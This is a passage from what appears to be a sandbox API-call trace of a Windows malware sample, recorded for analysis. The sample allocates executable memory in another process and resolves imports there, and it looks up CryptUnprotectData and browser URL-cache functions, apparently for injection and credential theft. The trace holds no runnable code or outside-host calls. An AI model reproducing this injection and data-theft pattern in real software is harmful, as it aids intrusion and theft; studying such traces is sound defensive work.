	[0198.057] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.057] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.058] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.058] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.058] lstrlenA (lpString="RegEnumValueW") returned 13
	[0198.058] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.059] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.059] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.059] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.059] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.059] lstrlenA (lpString="RegQueryValueExW") returned 16
	[0198.059] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.060] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.060] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.061] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.061] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.061] lstrlenA (lpString="CryptReleaseContext") returned 19
	[0198.061] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.061] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.062] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.062] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.062] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.062] lstrlenA (lpString="RevertToSelf") returned 12
	[0198.062] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.063] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.063] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.064] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.064] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.064] lstrlenA (lpString="CryptAcquireContextA") returned 20
	[0198.064] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.064] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.065] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.065] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.065] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc4a2, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0198.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc4a2, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=10 | out: lpWideCharStr="ole32.dll") returned 10
	[0198.065] lstrlenW (lpString="ole32.dll") returned 9
	[0198.065] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.066] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.068] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0198.069] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.069] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.069] lstrlenA (lpString="CoCreateInstance") returned 16
	[0198.069] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.069] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.070] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.070] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.070] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.070] lstrlenA (lpString="CoUninitialize") returned 14
	[0198.070] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.071] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.071] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.071] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.072] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.072] lstrlenA (lpString="CoInitialize") returned 12
	[0198.072] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.072] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.072] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.073] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.073] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0198.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc4d0, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=12 | out: lpWideCharStr="USERENV.dll") returned 12
	[0198.073] lstrlenW (lpString="USERENV.dll") returned 11
	[0198.073] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.074] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.076] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0198.076] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.077] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.077] lstrlenA (lpString="GetProfilesDirectoryA") returned 21
	[0198.077] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.077] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.077] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.078] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.078] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.078] lstrlenA (lpString="ExpandEnvironmentStringsForUserA") returned 32
	[0198.078] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.079] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.079] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.079] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.080] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc536, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0198.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc536, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=12 | out: lpWideCharStr="SHLWAPI.dll") returned 12
	[0198.080] lstrlenW (lpString="SHLWAPI.dll") returned 11
	[0198.080] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.080] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.082] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0198.082] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.082] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.082] lstrlenA (lpString="StrStrIA") returned 8
	[0198.082] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.083] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.083] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.083] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.084] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.084] lstrlenA (lpString="StrCmpW") returned 7
	[0198.084] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.084] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.121] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.121] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.121] lstrlenA (lpString="StrCpyNW") returned 8
	[0198.121] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.122] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.122] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.123] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.123] lstrlenA (lpString="StrChrW") returned 7
	[0198.123] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.123] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.124] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.124] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.124] lstrlenA (lpString="StrCatW") returned 7
	[0198.124] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.125] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.125] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.125] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.125] lstrlenA (lpString="StrStrA") returned 7
	[0198.125] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.126] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.127] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.127] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.127] lstrlenA (lpString="wnsprintfW") returned 10
	[0198.127] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.127] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.128] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.128] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.128] lstrlenA (lpString="StrChrA") returned 7
	[0198.128] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.129] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.129] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.129] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.130] lstrlenA (lpString="wnsprintfA") returned 10
	[0198.130] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.130] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.131] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.131] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc558, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0198.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc558, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=12 | out: lpWideCharStr="CRYPT32.dll") returned 12
	[0198.131] lstrlenW (lpString="CRYPT32.dll") returned 11
	[0198.131] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.132] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.135] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.135] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.135] lstrlenA (lpString="CryptUnprotectData") returned 18
	[0198.135] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.135] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.136] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.136] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc5ac, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0198.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc5ac, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=12 | out: lpWideCharStr="WININET.dll") returned 12
	[0198.136] lstrlenW (lpString="WININET.dll") returned 11
	[0198.136] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.137] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.150] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.150] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.150] lstrlenA (lpString="FindNextUrlCacheEntryW") returned 22
	[0198.150] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.151] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.151] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.152] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.152] lstrlenA (lpString="FindCloseUrlCache") returned 17
	[0198.152] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.152] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.153] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.153] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.153] lstrlenA (lpString="FindFirstUrlCacheEntryW") returned 23
	[0198.153] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.154] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.154] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.154] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0198.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc61e, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0198.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0198.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc61e, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=10 | out: lpWideCharStr="ntdll.dll") returned 10
	[0198.155] lstrlenW (lpString="ntdll.dll") returned 9
	[0198.155] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.155] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.156] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.156] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.156] lstrlenA (lpString="memcpy") returned 6
	[0198.156] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.157] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.157] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.157] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.157] lstrlenA (lpString="memcmp") returned 6
	[0198.157] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.158] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.159] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.159] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.159] lstrlenA (lpString="_wcslwr") returned 7
	[0198.159] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.159] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.160] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.160] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.160] lstrlenA (lpString="memmove") returned 7
	[0198.160] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.161] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.162] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.162] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.162] lstrlenA (lpString="memset") returned 6
	[0198.162] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.162] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.163] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.163] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.163] lstrlenA (lpString="wcschr") returned 6
	[0198.163] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.164] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.165] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.165] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.165] lstrlenA (lpString="strrchr") returned 7
	[0198.165] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.165] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.166] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.166] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.166] lstrlenA (lpString="_wcsicmp") returned 8
	[0198.166] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.167] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.167] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.168] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.168] lstrlenA (lpString="strncpy") returned 7
	[0198.168] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.168] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.169] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.169] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.169] lstrlenA (lpString="strstr") returned 6
	[0198.169] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.170] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.170] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.170] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.171] lstrlenA (lpString="strncmp") returned 7
	[0198.171] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.171] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.207] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.207] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.207] lstrlenA (lpString="strchr") returned 6
